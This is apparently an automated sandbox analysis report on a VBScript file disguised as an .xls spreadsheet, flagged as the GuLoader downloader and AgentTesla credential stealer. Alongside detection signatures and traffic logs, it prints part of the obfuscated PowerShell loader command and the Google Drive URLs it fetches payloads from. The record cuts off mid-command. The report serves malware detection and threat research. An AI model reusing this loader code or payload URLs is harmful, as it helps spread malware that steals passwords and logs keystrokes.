Windows Analysis Report
Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

Overview

General Information

Sample name:	Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs
Analysis ID:	1428797
MD5:	5d3834cac11c37e3bdee72fb190f69c7
SHA1:	ac14ebcd913ea2e2d51a8663127139105a50a810
SHA256:	5c9f85c6b9a542f488ca18de26cbeb294f86b4e31b61bdbf4ae1cff132d5abf9
Tags:	vbs
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected AgentTesla

Yara detected GuLoader

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Creates multiple autostart registry keys

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Installs a global keyboard hook

Potential malicious VBS script found (suspicious strings)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Cscript/Wscript Uncommon Script Extension Execution

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Very long command line found

Writes or reads registry keys via WMI

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

ReversingLabs: Detection: 37%

Source: unknown	HTTPS traffic detected: 74.125.136.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.136.100:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.8:49713 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2003573234.00000000008A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2003573234.0000000000904000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdbS source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: FTSKIaM.exe, FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YcoJxnONWB6oxPu1_87yG9QwC5hdAtbR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1YcoJxnONWB6oxPu1_87yG9QwC5hdAtbR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YcoJxnONWB6oxPu1_87yG9QwC5hdAtbR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1YcoJxnONWB6oxPu1_87yG9QwC5hdAtbR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: powershell.exe, 00000003.00000002.2240319276.000001F0A32A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ma
Source: powershell.exe, 00000003.00000002.2240319276.000001F0A32A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoX
Source: wscript.exe, 00000000.00000003.1405620829.000001A46831B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.1522074715.000001A468230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1405991772.000001A4682BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7c9d21128d36
Source: wscript.exe, 00000000.00000003.1406453153.000001A4682E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405991772.000001A4682BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000003.1406453153.000001A468296000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1406310996.000001A46826E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7c9d21128
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2004706353.0000000004581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ABD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.2004706353.0000000004581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C62C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ADF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C62C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ADF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_lyP
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_lyXR
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B05D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly&export=download
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B05D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.comP
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2126865356.000001F08BE7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 74.125.136.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.136.100:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.8:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7944.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Heathenise.ShellExecute Studiechef210,Hulloed,"","" ,Printprogrammerne

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6951
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6951	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6951	Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
